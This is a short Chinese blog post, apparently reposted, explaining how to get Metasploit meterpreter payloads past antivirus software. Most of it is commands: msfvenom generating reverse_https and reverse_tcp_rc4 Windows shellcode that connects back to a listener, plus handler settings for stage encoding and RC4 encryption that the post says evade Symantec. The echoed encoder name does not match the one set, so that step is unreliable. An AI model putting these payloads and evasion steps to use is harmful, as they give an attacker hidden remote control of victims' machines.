• msfvenom绕过杀软之stage编码


    这是green-m大佬提到的一种方式,使用reverse_https等payload时可以使用下列方法bypass部分杀软。

    生成payload:

    msfvenom -p windows/meterpreter/reverse_https lhost=10.211.55.2 lport=3333 -f c

    在msf中进行如下设置,将控制端向被控制端发送的stage进行编码

    msf exploit(multi/handler) > set EnableStageEncoding true //尝试使用不同的编码器对stage进行编码,可能绕过部分杀软的查杀
    EnableStageEncoding => true
    msf exploit(multi/handler) > set stageencoder x86/fnstenv_mov
    Stageencoder => x64/xor
    msf exploit(multi/handler) > set stageencodingfallback false
    stageencodingfallback => false

    同样,使用reverse_tcp_rc4也有同样的效果,而且不能设置stageencoder选项,更稳定更方便。

    msfvenom -p windows/meterpreter/reverse_tcp_rc4 lhost=10.211.55.2 lport=3333 RC4PASSWORD=tidesec -f c

    利用rc4对传输的数据进行加密,密钥在生成时指定,在监听的服务端设置相同的密钥。就可以在symantec眼皮下执行meterpreter。

  • 相关阅读:
    html语法规范
    html页面基本结构
    HTML头部结构详解
    文件路径中 / 和 ./ 和 ../的区别
    实体符号
    利用JS修改style属性和添加元素类名(important)
    Less
    Eureka自我保护计算
    Eureka元数据
    EurekaServer源码分析
  • 原文地址:https://www.cnblogs.com/yyxianren/p/12427004.html
Copyright © 2020-2023  润新知